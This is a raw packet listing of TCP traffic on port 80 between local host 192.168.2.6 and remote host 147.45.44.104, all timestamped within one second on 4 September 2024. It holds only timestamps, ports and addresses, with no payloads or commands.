Sep 4, 2024 17:37:08.123541117 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.123544931 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.123544931 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.123550892 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.123569965 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.123569965 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.123570919 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.123584032 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.123586893 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.123586893 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.123594999 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.123601913 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.123608112 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.123619080 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.123626947 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.123630047 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.123653889 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.123653889 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.123662949 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.124119997 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.124133110 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.124141932 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.124155045 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.124160051 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.124167919 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.124170065 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.124200106 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.124238014 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.124290943 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.124305010 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.124314070 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.124324083 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.124327898 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.124341965 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.124350071 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.124350071 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.124353886 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.124363899 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.124366045 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.124385118 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.124406099 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.124454021 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.124466896 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.124475002 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.124495029 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.124504089 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.124512911 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.124512911 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.124512911 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.124522924 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.124532938 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.124541998 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.124541998 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.124552965 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.124562025 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.124564886 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.124564886 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.124564886 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.124572039 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.124591112 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.124614000 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.125066996 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.125077009 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.125107050 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.125121117 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.125205994 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.125217915 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.125227928 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.125237942 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.125238895 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.125250101 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.125261068 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.125262022 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.125283003 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.125293016 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.125391960 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.125401020 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.125430107 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.125439882 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.125457048 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.125468969 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.125478029 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.125488043 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.125493050 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.125493050 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.125499010 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.125519037 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.125519037 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.125531912 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.125646114 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.125659943 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.125669956 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.125689030 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.125689030 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.125704050 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.125852108 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.125864983 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.125871897 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.125881910 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.125890970 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.125891924 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.125900984 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.125900984 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.125905037 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.125916004 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.125926018 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.125927925 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.125935078 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.125937939 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.125948906 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.125957966 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.125960112 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.125971079 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.125979900 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.125991106 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.125991106 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.125991106 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.125991106 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.126002073 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.126015902 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.126039028 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.126533985 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.126544952 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.126554012 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.126564980 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.126568079 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.126574993 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.126585960 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.126588106 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.126596928 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.126605034 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.126605988 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.126617908 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.126624107 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.126627922 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.126637936 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.126652956 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.126653910 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.126653910 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.126667023 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.126676083 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.126676083 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.126677990 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.126684904 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.126688004 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.126709938 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.126724005 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.126857996 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.126868010 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.126880884 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.126890898 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.126892090 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.126899958 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.126904964 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.126914024 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.126916885 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.126928091 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.126933098 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.126933098 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.126939058 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.126957893 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.126971006 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.127624989 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.127638102 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.127646923 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.127656937 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.127665043 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.127665043 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.127676964 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.127677917 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.127708912 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.127708912 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.127708912 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.127808094 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.127818108 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.127826929 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.127836943 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.127844095 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.127846956 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.127856970 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.127856970 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.127861977 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.127871990 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.127872944 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.127902985 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.127955914 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.127965927 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.127975941 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.127988100 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.127993107 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.127998114 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.128001928 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.128010035 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.128021002 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.128025055 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.128031015 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.128038883 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.128042936 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.128046989 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.128046989 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.128057957 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.128068924 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.128071070 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.128087997 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.128089905 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.128099918 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.128108978 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.128109932 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.128118992 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.128129005 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.128130913 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.128130913 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.128164053 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.128164053 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.128735065 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.128746033 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.128751040 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.128755093 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.128763914 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.128782988 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.128814936 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.128814936 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.128889084 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.128901005 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.128909111 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.128918886 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.128926992 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.128927946 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.128937006 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.128940105 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.128947973 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.128952980 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.128952980 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.128962040 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.128972054 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.128979921 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.128982067 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.128988981 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.129009008 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.129013062 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.129030943 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.129040956 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.129041910 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.129051924 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.129061937 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.129065037 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.129072905 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.129079103 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.129084110 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.129092932 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.129101038 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.129101038 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.129105091 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.129120111 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.129152060 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.129700899 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.129713058 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.129748106 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.129748106 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.129849911 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.129864931 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.129873991 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.129892111 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.129905939 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.130033970 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.130047083 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.130062103 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.130069971 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.130072117 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.130083084 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.130089998 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.130094051 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.130104065 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.130104065 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.130104065 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.130116940 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.130125999 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.130130053 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.130136013 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.130143881 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.130143881 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.130146027 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.130160093 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.130162001 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.130179882 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.130182028 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.130191088 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.130197048 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.130201101 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.130211115 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.130219936 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.130219936 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.130229950 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.130240917 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.130244017 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.130244017 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.130251884 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.130254984 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.130263090 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.130274057 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.130276918 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.130297899 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.130304098 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.130341053 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.130352020 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.130362988 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.130377054 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.130383015 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.130403042 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.130994081 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.131010056 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.131019115 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.131028891 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.131032944 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.131040096 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.131050110 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.131053925 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.131053925 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.131061077 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.131072998 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.131078005 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.131082058 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.131091118 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.131093025 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.131114960 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.131129980 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.131133080 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.131143093 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.131154060 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.131162882 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:08.131165981 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.131165981 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:08.131174088 CEST	80	49717	147.45.44.104	192.168.2.6
